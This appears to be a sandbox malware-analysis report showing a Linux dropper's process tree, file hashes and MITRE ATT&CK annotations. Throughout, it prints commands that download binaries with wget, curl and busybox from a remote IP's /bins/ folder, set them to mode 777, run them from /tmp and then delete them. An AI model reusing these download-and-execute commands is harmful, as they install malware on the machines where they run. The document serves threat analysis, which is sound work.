/usr/bin/wgetwget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:940
-
-
/bin/chmodchmod 777 EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx./EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm EW4jGzCKEmGLa0sQWYn8WvrSp1BcKPM2fx2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:946
-
-
/bin/chmodchmod 777 nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH./nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm nSlvYZrNXmCB5SHN5OudCadA3RFTBeDqyH2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:952
-
-
/bin/chmodchmod 777 s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB./s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm s69roBeNzFoKEI0aEGFt773QBfQSZCVzwB2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:958
-
-
/bin/chmodchmod 777 ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr./ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm ko9QGxrwl2TM3zI2PCptTDYliMQuSnwSYr2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:964
-
-
/bin/chmodchmod 777 gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK./gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm gO6nKPFUoK0m2bR0h6vuJWgqpJ51AwHuSK2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:970
-
-
/bin/chmodchmod 777 vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y./vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm vRtJtcZAIO3z1NAcKnzrv5wFyR6ee7xs9y2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:976
-
-
/bin/chmodchmod 777 Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd./Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm Ih4D38xDeospbvsFFnUOBtOaGxSl05NBVd2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97